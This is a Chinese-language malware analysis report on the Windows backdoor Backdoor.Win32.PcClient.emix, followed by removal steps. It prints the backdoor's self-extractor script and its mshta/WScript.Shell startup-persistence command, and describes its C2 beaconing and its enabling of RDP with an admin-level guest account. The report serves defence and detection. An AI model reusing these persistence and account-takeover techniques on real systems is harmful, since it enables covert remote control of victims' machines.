Backdoor.Win32.PcClient.emix分析

一、 病毒标签：
病毒名称： Backdoor.Win32.PcClient.emix
病毒类型： 后门
文件 MD5： B9CD87FE5C1D6098D169DE5C952DEDF9
公开范围： 完全公开
危害等级： 3
文件长度： 44,735 字节
感染系统： Windows 98以上版本
开发工具： Microsoft Visual C++ 6.0
加壳类型： PECompact 2.x -> Jeremy Collake

二、 病毒描述：
    该病毒是一个后门程序，通过招聘邮件附件的方式进行传播。附件程序通过自解压文件格式将自己伪装成图片管理软件ACDSee，压缩的文件包括伪装的后门程序和一张图片，运行自解压程序后利用自解压特性自动加载后门程序。将系统信息发送到指定地址，尝试开启3389远程桌面服务，来达到远程控制的目的。利用图片用来欺骗用户。安天实验室反病毒专家提醒广大用户，不要随便打开陌生邮件的附件。

三、 行为分析：
本地行为:
1、附件运行后，进行自解压，提示“Need to uncompress after see photos!”选择安装目录，会在用户选择的安装目录下释放图片文件DSG001.jpg和病毒文件DSG002.exe（PECompact壳），然后运行DSG002.exe。下面的注释包含自解压脚本命令
Setup=DSG002.exe
Title=Need compressed
Text
{
Need to uncompress after see photos!
}
DSG002.exe分析，运行后获取用户临时文件夹%temp%，然后创建一个临时文件aa.tmp(aa随机，取决于系统环境)，查找资源类型为RES_FILE，资源名为101的资源，并将解密的数据写入aa.tmp文件，因为PECompact对资源进行了加密。获取用户目录下的Application Data目录，尝试删除该目录下的8..tmp.exe程序，将DSG002.exe移动到Application Data目录并命名为8.tmp.exe。获取系统目录下的mshta.exe路径。获取用户启动目录，在该目录下生成“网络连接.lnk”的快捷方式，并写入以下内容，达到开机启动的目的。
C:\WINDOWS\system32\mshta.exe "javascript:eval('new ActiveXObject(\'Wscript.shell\').Run(\'C:\x2fDOCUME~1\x2fusername\x2fAPPLIC~1\x2f8.tmp.exe\');window.close();')"
连接www.myfocusblog.info地址，以Get方式提交计算机名进行统计。c执行一个新的进程利用rundll32.exe程序加载释放的aa.tmp（dll）文件，并调用DllStart函数。开启进程，利用CMD删除病毒程序，终止病毒进程。
aa.tmp分析，从文件尾部获取加密的链接地址1@@@@@+uYF/ADy8AH7/AS99v0F/Kmnr6+vnw==,解密后为www.myfocusblog.info:8000，连接该地址获取登陆信息，打开3389远程连接服务，激活guest账户，设置密码++++++，并将Guest账户添加到管理员组。
2、文件运行后会释放以下文件
用户选择的安装目录\DSG001.jpg
用户目录\Application Data\8.tmp.exe
%temp%\aa.tmp
%启动%\网络连接.lnk
3、添加注册表启动项
无注册表修改
网络行为:
协议：HTTP
端口：80
连接域名：www.myfocus****.info
描述：通过GET方式进行统计，格式如下：
GET /count/count.asp?info=ANTIY-6C9E85756

协议：TCP
端口：8000
连接域名：www.myfocus****.info
获取登陆信息。

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
        %Windir% 　　　　　 　　　　　  WINDODWS所在目录
　　　　%DriveLetter%　 　　　　　　　   逻辑驱动器根目录
　　　　%ProgramFiles%　 　 　　　　　  系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　   当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　 　　　　　　　  \当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　 系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是%WINDOWS%\System
　　　　windowsXP中默认的安装路径是%system32%　　　


四、 清除方案：
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载：http://www.antiy.com
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
1) 使用ATOOL管理工具，“进程管理“结束进程名为rundll32.exe包括aa.tmp模块的进程。
2) 强行删除病毒文件
删除%temp%目录下的aa.tmp临时文件（大小82,944 字节）。
删除用户目录\Application Data\8.tmp.exe。
删除%启动%\网络连接.lnk。
3) 如果不需要Guest账号，请关闭。如果需要，请修改密码。